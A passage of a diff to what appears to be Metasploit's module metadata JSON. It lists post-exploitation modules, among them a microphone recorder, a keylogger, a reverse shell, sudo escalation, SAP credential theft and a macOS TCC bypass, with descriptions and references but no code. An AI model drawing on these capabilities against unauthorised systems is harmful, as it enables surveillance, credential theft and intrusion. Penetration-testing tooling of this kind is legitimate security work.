Bloom" + ], + "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to query and will store the\n results.\n\n Please note: backslash quotes and your (stacked or not) queries should\n end with a semicolon.", + "references": [ + "URL-http://youtu.be/0LCLRVHX1vA" + ], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/dbvis_query.rb", + "is_install_path": true, + "ref_name": "multi/manage/dbvis_query", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/fileshare": { + "name": "Browse the session filesystem in a Web Browser", + "fullname": "post/multi/manage/fileshare", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module allows you to browse the session filesystem via a local\n browser window.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-10-25 17:19:45 +0000", + "path": "/modules/post/multi/manage/fileshare.rb", + "is_install_path": true, + "ref_name": "multi/manage/fileshare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "SideEffects": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/hsts_eraser": { + "name": "Web browsers HSTS entries eraser", + "fullname": "post/multi/manage/hsts_eraser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sheila A. Berta (UnaPibaGeek)" + ], + "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.", + "references": [ + "URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html", + "URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/hsts_eraser.rb", + "is_install_path": true, + "ref_name": "multi/manage/hsts_eraser", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/multi_post": { + "name": "Multi Manage Post Module Macro Execution", + "fullname": "post/multi/manage/multi_post", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "carlos_perez " + ], + "description": "This module will execute a list of modules given in a macro file in the format\n of against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/multi_post.rb", + "is_install_path": true, + "ref_name": "multi/manage/multi_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/open": { + "name": "Open a file or URL on the target computer", + "fullname": "post/multi/manage/open", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Eliott Teissonniere" + ], + "description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/open.rb", + "is_install_path": true, + "ref_name": "multi/manage/open", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/play_youtube": { + "name": "Multi Manage YouTube Broadcast", + "fullname": "post/multi/manage/play_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.", + "references": [], + "platform": "Android,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/play_youtube.rb", + "is_install_path": true, + "ref_name": "multi/manage/play_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "audio-effects", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/record_mic": { + "name": "Multi Manage Record Microphone", + "fullname": "post/multi/manage/record_mic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/record_mic.rb", + "is_install_path": true, + "ref_name": "multi/manage/record_mic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/screensaver": { + "name": "Multi Manage the screensaver of the target computer", + "fullname": "post/multi/manage/screensaver", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "Eliott Teissonniere", + "Julien Voisin" + ], + "description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.", + "references": [ + "URL-https://gitlab.gnome.org/GNOME/gnome-shell/-/issues/7530" + ], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/manage/screensaver.rb", + "is_install_path": true, + "ref_name": "multi/manage/screensaver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LOCK", + "description": "Lock the current session" + }, + { + "name": "START", + "description": "Start the screensaver, may lock the current session" + }, + { + "name": "STOP", + "description": "Stop the screensaver, user may be prompted for its password" + }, + { + "name": "UNLOCK", + "description": "Unlock the current session" + } + ] + }, + "post_multi/manage/screenshare": { + "name": "Multi Manage the screen of the target meterpreter session", + "fullname": "post/multi/manage/screenshare", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module allows you to view and control the screen of the target computer via\n a local browser window. The module continually screenshots the target screen and\n also relays all mouse and keyboard events to session.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-09-23 15:03:19 +0000", + "path": "/modules/post/multi/manage/screenshare.rb", + "is_install_path": true, + "ref_name": "multi/manage/screenshare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/set_wallpaper": { + "name": "Multi Manage Set Wallpaper", + "fullname": "post/multi/manage/set_wallpaper", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.", + "references": [], + "platform": "Android,Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/set_wallpaper.rb", + "is_install_path": true, + "ref_name": "multi/manage/set_wallpaper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/shell_to_meterpreter": { + "name": "Shell to Meterpreter Upgrade", + "fullname": "post/multi/manage/shell_to_meterpreter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": "This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", + "is_install_path": true, + "ref_name": "multi/manage/shell_to_meterpreter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/sudo": { + "name": "Multiple Linux / Unix Post Sudo Upgrade Shell", + "fullname": "post/multi/manage/sudo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "todb ", + "Ryan Baxendale " + ], + "description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.", + "references": [ + "URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h" + ], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/sudo.rb", + "is_install_path": true, + "ref_name": "multi/manage/sudo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "account-lockouts" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_multi/manage/system_session": { + "name": "Multi Manage System Remote TCP Shell Session", + "fullname": "post/multi/manage/system_session", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.", + "references": [], + "platform": "Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/system_session.rb", + "is_install_path": true, + "ref_name": "multi/manage/system_session", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/upload_exec": { + "name": "Upload and Execute", + "fullname": "post/multi/manage/upload_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "egypt " + ], + "description": "Push a file and execute it.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/upload_exec.rb", + "is_install_path": true, + "ref_name": "multi/manage/upload_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_multi/manage/zip": { + "name": "Multi Manage File Compressor", + "fullname": "post/multi/manage/zip", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. If not, it falls\n back to its Windows Scripting Host.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/zip.rb", + "is_install_path": true, + "ref_name": "multi/manage/zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/local_exploit_suggester": { + "name": "Multi Recon Local Exploit Suggester", + "fullname": "post/multi/recon/local_exploit_suggester", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r ", + "Mo" + ], + "description": "This module suggests local Metasploit exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.", + "references": [], + "platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/local_exploit_suggester.rb", + "is_install_path": true, + "ref_name": "multi/recon/local_exploit_suggester", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/multiport_egress_traffic": { + "name": "Generate TCP/UDP Outbound Traffic On Multiple Ports", + "fullname": "post/multi/recon/multiport_egress_traffic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", + "is_install_path": true, + "ref_name": "multi/recon/multiport_egress_traffic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/reverse_lookup": { + "name": "Reverse Lookup IP Addresses", + "fullname": "post/multi/recon/reverse_lookup", + "aliases": [ + "post/windows/gather/reverse_lookup", + "post/windows/recon/resolve_ip" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module reverse resolves an IP address or IP address range to hostnames.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-05 13:18:35 +0000", + "path": "/modules/post/multi/recon/reverse_lookup.rb", + "is_install_path": true, + "ref_name": "multi/recon/reverse_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/sudo_commands": { + "name": "Sudo Commands", + "fullname": "post/multi/recon/sudo_commands", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/sudo_commands.rb", + "is_install_path": true, + "ref_name": "multi/recon/sudo_commands", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/sap/smdagent_get_properties": { + "name": "Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server", + "fullname": "post/multi/sap/smdagent_get_properties", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Yvan Genuer", + "Vladimir Ivanov" + ], + "description": "This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials\n used by the SMDAgent to connect to the SAP Solution Manager server.", + "references": [ + "CVE-2019-0307", + "URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf" + ], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/sap/smdagent_get_properties.rb", + "is_install_path": true, + "ref_name": "multi/sap/smdagent_get_properties", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_brocade": { + "name": "Brocade Gather Device General Information", + "fullname": "post/networking/gather/enum_brocade", + "aliases": [ + "post/brocade/gather/enum_brocade" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects Brocade device information and configuration.\n This module has been tested against an icx6430 running 08.0.20T311.", + "references": [], + "platform": "Brocade", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:13:25 +0000", + "path": "/modules/post/networking/gather/enum_brocade.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_brocade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_cisco": { + "name": "Cisco Gather Device General Information", + "fullname": "post/networking/gather/enum_cisco", + "aliases": [ + "post/cisco/gather/enum_cisco" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module collects a Cisco IOS or NXOS device information and configuration.", + "references": [], + "platform": "Cisco", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_cisco.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_cisco", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_f5": { + "name": "F5 Gather Device General Information", + "fullname": "post/networking/gather/enum_f5", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects a F5's device information and configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_f5.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_f5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_juniper": { + "name": "Juniper Gather Device General Information", + "fullname": "post/networking/gather/enum_juniper", + "aliases": [ + "post/juniper/gather/enum_juniper" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.", + "references": [], + "platform": "Juniper", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:13:25 +0000", + "path": "/modules/post/networking/gather/enum_juniper.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_juniper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_mikrotik": { + "name": "Mikrotik Gather Device General Information", + "fullname": "post/networking/gather/enum_mikrotik", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects Mikrotik device information and configuration.\n This module has been tested against RouterOS 6.45.9.", + "references": [], + "platform": "Mikrotik", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_mikrotik.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_mikrotik", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_vyos": { + "name": "VyOS Gather Device General Information", + "fullname": "post/networking/gather/enum_vyos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects VyOS device information and configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_vyos.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_vyos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/admin/say": { + "name": "OS X Text to Speech Utility", + "fullname": "post/osx/admin/say", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.", + "references": [ + "URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/admin/say.rb", + "is_install_path": true, + "ref_name": "osx/admin/say", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "audio-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/capture/keylog_recorder": { + "name": "OSX Capture Userspace Keylogger", + "fullname": "post/osx/capture/keylog_recorder", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/capture/keylog_recorder.rb", + "is_install_path": true, + "ref_name": "osx/capture/keylog_recorder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/capture/screen": { + "name": "OSX Screen Capture", + "fullname": "post/osx/capture/screen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth " + ], + "description": "This module takes screenshots of target desktop and automatically downloads them.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/capture/screen.rb", + "is_install_path": true, + "ref_name": "osx/capture/screen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/escalate/tccbypass": { + "name": "Bypass the macOS TCC Framework", + "fullname": "post/osx/escalate/tccbypass", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mattshockl", + "timwr" + ], + "description": "This module exploits a vulnerability in the TCC daemon on macOS Catalina\n (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be\n manipulated (by setting the HOME environment variable) to use a new user\n controlled location as the TCC database. We can then grant ourselves\n entitlements by inserting them into this new database.", + "references": [ + "CVE-2020-9934", + "URL-https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8", + "URL-https://github.com/mattshockl/CVE-2020-9934" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/osx/escalate/tccbypass.rb", + "is_install_path": true, + "ref_name": "osx/escalate/tccbypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/apfs_encrypted_volume_passwd": { + "name": "Mac OS X APFS Encrypted Volume Password Disclosure", + "fullname": "post/osx/gather/apfs_encrypted_volume_passwd", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-21", + "type": "post", + "author": [ + "Sarah Edwards", + "cbrnrd" + ], + "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.", + "references": [ + "URL-https://thehackernews.com/2018/03/macos-apfs-password.html", + "URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp" + ], + "platform": "OSX", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, 